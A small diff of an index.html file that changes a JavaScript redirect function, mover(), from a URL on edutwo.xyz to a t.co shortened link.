--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <script type='text/javascript'>
 
   function mover(){
-    window.location = 'https://edutwo.xyz/395-2/'
+    window.location = 'https://t.co/nXi8ruFQbU'
 
   }; 
 
